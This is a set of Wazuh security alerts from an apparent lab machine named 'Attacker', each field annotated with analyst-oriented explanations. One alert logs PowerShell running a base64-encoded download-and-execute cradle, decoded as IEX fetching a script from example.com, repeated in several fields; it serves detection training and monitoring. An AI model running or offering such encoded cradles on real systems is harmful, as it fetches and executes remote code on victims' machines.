data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that created the file. Windows PowerShell writing into its own user's Temp folder is expected start-up behaviour; the rule fired on the target path and extension, not on this image.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_twhlr5xs.n4e.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:34.252
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:40:37.530+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:37.530+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19012
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534437.2110662
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26162
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Authentication Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in authentication policy. Events for this subcategory include: - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4713: Kerberos policy was changed. - 4716: Trusted domain information was modified. - 4717: System security access was granted to an account. - 4718: System security access was removed from an account. - 4739: Domain Policy was changed. - 4864: A namespace collision was detected. - 4865: A trusted forest information entry was added. - 4866: A trusted forest information entry was removed. - 4867: A trusted forest information entry was modified. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authentication Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Authentication Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Authentication Policy Change"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  passed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:38.625+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:38.625+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  112
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534438.2114357
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:36.5211059Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  286074
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:35.479 ProcessGuid: {94294ddc-bde3-680a-db0b-000000000e00} ProcessId: 6708 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00} ParentProcessId: 2532 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:35.479
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bde3-680a-db0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6708
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bde0-680a-d80b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2532
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:38.629+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:38.629+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  116
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534438.2122420
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:36.7393600Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  286075
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:36.716 ProcessGuid: {94294ddc-bde3-680a-db0b-000000000e00} ProcessId: 6708 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_incsmgqj.jzi.ps1 CreationUtcTime: 2025-04-24 22:40:36.716 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:36.716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bde3-680a-db0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6708
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_incsmgqj.jzi.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:36.716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:08.577+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:08.577+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.3']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534468.2125185
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26163
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Authorization Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in authorization policy. Events for this subcategory include: - 4704: A user right was assigned. - 4705: A user right was removed. - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4714: Encrypted data recovery policy was changed. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Authorization Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Authorization Policy Change"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:32.835+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:32.835+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  59
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534492.2128210
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:27.0967356Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43893
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique 